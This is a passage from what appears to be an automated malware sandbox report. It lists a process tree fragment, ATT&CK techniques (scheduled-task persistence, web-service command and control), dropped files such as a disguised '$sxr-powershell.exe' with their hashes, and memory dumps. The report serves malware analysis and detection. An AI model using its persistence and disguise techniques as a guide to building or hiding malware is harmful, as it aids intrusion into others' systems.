                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:2064
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                          1⤵
                                                                                                            PID:4164

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                          Execution

                                                                                                          Scheduled Task/Job

                                                                                                          1
                                                                                                          T1053

                                                                                                          Persistence

                                                                                                          Scheduled Task/Job

                                                                                                          1
                                                                                                          T1053

                                                                                                          Privilege Escalation

                                                                                                          Scheduled Task/Job

                                                                                                          1
                                                                                                          T1053

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                            Filesize

                                                                                                            162KB

                                                                                                            MD5

                                                                                                            152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                            SHA1

                                                                                                            c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                            SHA256

                                                                                                            a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                            SHA512

                                                                                                            2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                            Filesize

                                                                                                            409KB

                                                                                                            MD5

                                                                                                            7417c8c73e614f293152575f46134216

                                                                                                            SHA1

                                                                                                            cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                            SHA256

                                                                                                            00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                            SHA512

                                                                                                            897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_cucaux1b.dvm.ps1
                                                                                                            Filesize

                                                                                                            60B

                                                                                                            MD5

                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                            SHA1

                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                            SHA256

                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                            SHA512

                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                            SHA1

                                                                                                            445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                            SHA256

                                                                                                            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                            SHA512

                                                                                                            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            39e7335d6b27147ba82cebb03f348f45

                                                                                                            SHA1

                                                                                                            d340283071e106cefd111b6c0058b7ea7f2ee38c

                                                                                                            SHA256

                                                                                                            88809d8a5e6ae13b10633539ec5eee82aaf0f5cdc2dfb06547413aec2c59ce4a

                                                                                                            SHA512

                                                                                                            f348639c7b203c96ca60328270d938c39f1a6c4246ee74610033cba8fb04979407df07f9067acdde897026bf1315093b1d8e08691ce64dc5c3ac586e1a2cc527

                                                                                                          • memory/380-5-0x00000000054B0000-0x0000000005516000-memory.dmp
                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/380-20-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/380-7-0x0000000006700000-0x000000000673C000-memory.dmp
                                                                                                            Filesize

                                                                                                            240KB

                                                                                                          • memory/380-0-0x000000007518E000-0x000000007518F000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/380-4-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/380-3-0x0000000005530000-0x00000000055C2000-memory.dmp
                                                                                                            Filesize

                                                                                                            584KB

                                                                                                          • memory/380-2-0x0000000005990000-0x0000000005F34000-memory.dmp
                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/380-6-0x00000000061C0000-0x00000000061D2000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/380-1-0x0000000000A40000-0x0000000000AAC000-memory.dmp
                                                                                                            Filesize

                                                                                                            432KB

                                                                                                          • memory/404-107-0x000001E68FD90000-0x000001E68FDBB000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/612-62-0x000001A43E210000-0x000001A43E23B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/612-69-0x000001A43E210000-0x000001A43E23B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/612-70-0x00007FFE0E5B0000-0x00007FFE0E5C0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/612-63-0x000001A43E210000-0x000001A43E23B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/612-61-0x000001A43E1E0000-0x000001A43E205000-memory.dmp
                                                                                                            Filesize

                                                                                                            148KB

                                                                                                          • memory/664-80-0x000001E409510000-0x000001E40953B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/664-81-0x00007FFE0E5B0000-0x00007FFE0E5C0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/664-74-0x000001E409510000-0x000001E40953B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/940-85-0x000001CFDA5D0000-0x000001CFDA5FB000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/940-91-0x000001CFDA5D0000-0x000001CFDA5FB000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/940-92-0x00007FFE0E5B0000-0x00007FFE0E5C0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1012-102-0x000002D72CB50000-0x000002D72CB7B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/1012-103-0x00007FFE0E5B0000-0x00007FFE0E5C0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1012-96-0x000002D72CB50000-0x000002D72CB7B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/1580-35-0x0000000006790000-0x000000000679A000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/1580-1101-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/1580-1100-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/1580-13-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/1580-14-0x0000000075180000-0x0000000075930000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.7MB

                                                                                                          • memory/2096-30-0x000001F67FCC0000-0x000001F67FCE2000-memory.dmp
                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/2096-45-0x000001F61AD40000-0x000001F61AD6A000-memory.dmp
                                                                                                            Filesize

                                                                                                            168KB

                                                                                                          • memory/2096-47-0x00007FFE4CCF0000-0x00007FFE4CDAE000-memory.dmp
                                                                                                            Filesize

                                                                                                            760KB

                                                                                                          • memory/2096-46-0x00007FFE4E530000-0x00007FFE4E725000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.0MB

                                                                                                          • memory/3720-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3720-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3720-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3720-57-0x00007FFE4CCF0000-0x00007FFE4CDAE000-memory.dmp
                                                                                                            Filesize

                                                                                                            760KB

                                                                                                          • memory/3720-56-0x00007FFE4E530000-0x00007FFE4E725000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.0MB

                                                                                                          • memory/3720-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3720-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3720-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB